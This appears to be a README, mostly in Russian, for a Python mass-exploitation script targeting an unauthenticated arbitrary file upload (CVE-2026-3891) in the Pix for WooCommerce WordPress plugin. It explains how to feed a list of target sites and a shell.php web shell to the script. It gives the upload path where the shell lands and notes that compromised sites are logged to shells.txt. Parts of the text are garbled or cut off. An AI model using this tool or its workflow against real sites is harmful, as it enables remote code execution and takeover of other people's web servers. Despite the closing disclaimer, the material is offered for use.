
Pix for WooCommerce <= 1.5.0 - Неаутентифицированная произвольная загрузка файлов
Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
Плагин Pix for WooCommerce для WordPress уязвим к неавторизованной произвольной загрузке файлов из-за:
в функции lkn_pix_for_woocommerce_c6_save_settings во всех версиях до 1.5.0 включительно.
Это позволяет удалённым неавторизованным атакующим загружать произвольные файлы, что приводит к удалённому выполнению кода (RCE).
CVE-2026-38919.8 (Critical)CVE-2026-3891.py@Kxploitpip install requests rich
Создайте файл:
list.txt
Пример:
http://example.com
https://target.com
victim-site.com
Если протокол отсутствует → скрипт автоматически добавляет
http://
Поместите ваш файл шелла в ту же директорию:
shell.php
python3 CVE-2026-3891.py
Скрипт запросит:
list.txt)8)shell.php)/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<shell>.php
FAIL http://target.com (reason)
shells.txt
Progress 5/20 OK:3 FAIL:2
Данный проект предоставляется только для образовательного и авторизованного тестирования безопасности.
Nxploited